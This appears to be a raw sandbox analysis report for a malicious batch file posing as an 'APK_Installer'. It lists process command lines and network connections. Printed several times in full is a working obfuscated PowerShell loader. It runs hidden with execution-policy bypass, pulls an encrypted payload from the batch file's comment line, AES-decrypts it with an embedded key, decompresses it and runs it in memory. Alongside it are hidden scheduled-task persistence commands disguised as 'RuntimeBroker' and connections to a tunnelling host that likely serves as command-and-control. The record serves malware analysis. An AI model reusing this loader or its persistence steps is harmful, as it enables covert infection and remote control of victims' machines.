C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2416 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_714_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_714.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_714.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_714.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_714.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_714.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1692 /prefetch:1

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\Instructions.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7000 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_242_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_242.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_242.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_242.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_242.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_242.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_690_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_690.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_690.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_690.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_690.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_690.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 24.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 147.185.221.18:45119 looking-memphis.gl.at.ply.gg tcp
NL 23.62.61.160:443 www.bing.com tcp
NL 23.62.61.170:443 www.bing.com tcp
NL 23.62.61.170:443 www.bing.com tcp
NL 23.62.61.75:443 th.bing.com tcp
NL 23.62.61.75:443 th.bing.com tcp
IE 20.190.159.2:443 login.microsoftonline.com tcp
US 151.101.1.171:443 geoip.businessinsider.com tcp
US 151.101.1.171:443 geoip.businessinsider.com tcp
US 147.185.221.18:45119 looking-memphis.gl.at.ply.gg tcp
US 13.107.5.80:443 services.bingapis.com tcp
US 151.101.2.217:443 i.insider.com tcp
US 151.101.2.217:443 i.insider.com tcp
FR 18.164.52.33:443 cmp.osano.com tcp
FR 18.164.52.33:443 cmp.osano.com tcp
US 151.101.1.171:443 geoip.businessinsider.com tcp
US 8.8.8.8:53 my.businessinsider.com udp
US 151.101.0.64:443 i.businessinsider.com tcp
US 104.22.44.136:443 my.businessinsider.com tcp
FR 18.244.28.74:443 cdn.flipboard.com tcp
US 104.18.43.90:443 cdn.confiant-integrations.net tcp
US 172.64.146.86:443 businessinsider.edge.permutive.app tcp
US 104.21.50.90:443 sdk.mrf.io tcp
FR 18.244.28.87:443 cdn-magiclinks.trackonomics.net tcp
NL 23.63.101.170:80 apps.identrust.com tcp
US 8.8.8.8:53 136.44.22.104.in-addr.arpa udp
US 8.8.8.8:53 74.28.244.18.in-addr.arpa udp
US 8.8.8.8:53 90.43.18.104.in-addr.arpa udp
US 8.8.8.8:53 86.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 90.50.21.104.in-addr.arpa udp
US 8.8.8.8:53 87.28.244.18.in-addr.arpa udp
US 8.8.8.8:53 pub.doubleverify.com udp
US 8.8.8.8:53 micro.rubiconproject.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 151.101.0.64:443 i.businessinsider.com tcp
US 104.18.166.224:443 pub.doubleverify.com tcp
GB 142.250.200.34:443 securepubads.g.doubleclick.net tcp
BE 104.68.78.171:443 micro.rubiconproject.com tcp
US 35.201.104.135:443 vi.ml314.com tcp
US 34.117.77.79:443 ml314.com tcp
US 104.18.239.248:443 cdn.tinypass.com tcp
US 18.245.174.120:443 c.amazon-adsystem.com tcp
GB 142.250.187.202:443 imasdk.googleapis.com tcp
